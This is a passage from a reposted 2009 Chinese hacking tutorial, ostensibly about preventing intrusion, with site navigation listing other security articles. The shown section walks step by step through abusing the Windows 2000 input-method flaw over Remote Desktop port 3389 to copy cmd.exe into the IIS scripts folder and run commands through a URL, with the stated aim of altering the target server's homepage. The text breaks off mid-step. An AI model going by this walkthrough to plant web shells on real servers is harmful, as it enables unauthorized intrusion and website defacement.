当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客攻防技术内幕-防止入侵的方法(5)

安全基础
蜜罐技术:消除防火墙局限和脆弱
“网络隔离”技术安全要素 发展方向概述
分析并解决局域网内盗用IP的安全问题
防止全局钩子的侵入
安全编程: 避免竞争条件(1)
安全编程: 避免竞争条件(2)
安全编程: 避免竞争条件(3)
安全编程: 避免竞争条件(4)
安全编程: 避免竞争条件(5)
银行系统使用指纹识别技术的利弊
CLR 中代码访问安全检测实现原理(1)
CLR 中代码访问安全检测实现原理(2)
CLR 中代码访问安全检测实现原理(4)
CLR 中代码访问安全检测实现原理(5)
木马经典十大藏身地点大搜查(1)
木马经典十大藏身地点大搜查(2)
菜鸟必读:网站被入侵后需做的检测(1)
菜鸟必读:网站被入侵后需做的检测(2)
红客必学:Windows下的权限设置详解(1)
红客必学:Windows下的权限设置详解(2)

安全基础 中的 黑客攻防技术内幕-防止入侵的方法(5)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 99 ::
收藏到网摘: n/a

6.2 基于3389端口结合输入法漏洞入侵(2)

    

6.2.2  通过输入法漏洞简单更改目标服务器的主页

(1) 在如图6-36所示的【跳至URL】对话框中输入D:\winnt\system32\cmd.exe(这里是Win2k安装在D),单击【确定】按钮,如图6-36所示。

6-36  输入CMD程序路径

(2) 此时会出现下载CMD.exe程序对话框,如图6-37所示。

6-37  下载CMD程序

(3) 在【文件下载】对话框中选择【将该程序保存到磁盘】单选按钮,单击【确定】按钮将CMD保存到d:\inetpub\scripts目录下,如图6-38所示。

6-38  CMD程序保存到Scripts目录下

(4) 在如图6-36所示的【跳至URL】中输入http://127.0.0.1/scripts/cmd.exe?/c+dir+d:\,可以列出D盘目录,如图6-39所示。

6-39  列出